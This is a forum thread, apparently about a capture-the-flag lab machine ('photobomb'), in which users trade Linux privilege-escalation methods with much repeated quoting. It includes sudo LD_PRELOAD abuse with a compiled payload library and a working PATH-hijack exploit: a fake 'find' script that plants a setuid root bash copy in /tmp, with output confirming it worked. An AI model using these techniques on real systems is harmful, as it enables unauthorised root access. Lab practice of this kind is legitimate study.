(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library, that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh

how did you get to know about LD_PRELOAD exploit

(October 8, 2022, 09:10 PM)Giovanni0 Wrote:

(October 8, 2022, 09:04 PM)achillescarter Wrote:

(October 8, 2022, 09:02 PM)yumi Wrote: Linux Privilege Escalation using LD_Preload - Hacking Articles

@araaraara

when I try to use the sudo it's asking for the password

Save you shell.so in /tmp, then:

sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh

wizard@photobomb:/tmp$  sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh
sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
ERROR: ld.so: object '/tmp/shell.so' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.

(October 8, 2022, 09:11 PM)pandu Wrote:

(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library, that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh

how did you get to know about LD_PRELOAD exploit

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

(October 8, 2022, 09:19 PM)SirKonafa Wrote:

(October 8, 2022, 09:11 PM)pandu Wrote:

(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library, that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh

how did you get to know about LD_PRELOAD exploit

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

The problem with this is I can't run the "gcc"

wizard@photobomb:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Command 'gcc' not found, but can be installed with:

(October 8, 2022, 09:22 PM)achillescarter Wrote:

(October 8, 2022, 09:19 PM)SirKonafa Wrote:

(October 8, 2022, 09:11 PM)pandu Wrote:

(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library, that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh

how did you get to know about LD_PRELOAD exploit

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

The problem with this is I can't run the "gcc"

wizard@photobomb:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Command 'gcc' not found, but can be installed with:

Compile it locally on your own machine then transfer it to the target machine.

BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd,find,chown with relative paths. So, you can also go the path hijacking route too.

(October 8, 2022, 09:19 PM)SirKonafa Wrote:

(October 8, 2022, 09:11 PM)pandu Wrote:

(October 8, 2022, 08:56 PM)11231123 Wrote: For root: Compile a library, that will execute your payload.

Then just use LD_PRELOAD, like:

sudo LD_PRELOAD=/tmp/lol.so /opt/cleanup.sh

how did you get to know about LD_PRELOAD exploit

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#:~:text=LD_PRELOAD%20%26%20LD_LIBRARY_PATH

sudo -l doesn't give any information about LD_LIBRARY_PATH. Also, that hacking article mentioned that if u run: sudo -l and you see the output like: env_keep += LD_PRELOAD
Then u could gain root via this method!

(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd,find,chown with relative paths. So, you can also go the path hijacking route too.

no , root user hash its own .bashrc in the /opt folder !

(October 8, 2022, 09:37 PM)testbypsy Wrote:

(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd,find,chown with relative paths. So, you can also go the path hijacking route too.

no , root user hash its own .bashrc in the /opt folder !

wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?

(October 8, 2022, 09:38 PM)11231123 Wrote:

(October 8, 2022, 09:37 PM)testbypsy Wrote:

(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd,find,chown with relative paths. So, you can also go the path hijacking route too.

no , root user hash its own .bashrc in the /opt folder !

wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?

you get asked for a password kiddo !

---

(October 8, 2022, 09:38 PM)11231123 Wrote:

(October 8, 2022, 09:37 PM)testbypsy Wrote:

(October 8, 2022, 09:29 PM)11231123 Wrote: BTW, if you are having trouble with compiling the library and such, the /opt/cleanup.sh script also runs stuff like cd,find,chown with relative paths. So, you can also go the path hijacking route too.

no , root user hash its own .bashrc in the /opt folder !

wizard@photobomb:~$ cat find
#!/bin/bash
cp /bin/bash /tmp/asd; chmod 4777 /tmp/asd
wizard@photobomb:~$ chmod 777 find
wizard@photobomb:~$ sudo PATH=/home/wizard:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin /opt/cleanup.sh
wizard@photobomb:~$ ls -la /tmp/asd
-rwsrwxrwx 1 root root 1183448 Oct  8 21:37 /tmp/asd

?

oh dang , it works , my bad i was also including the export command :)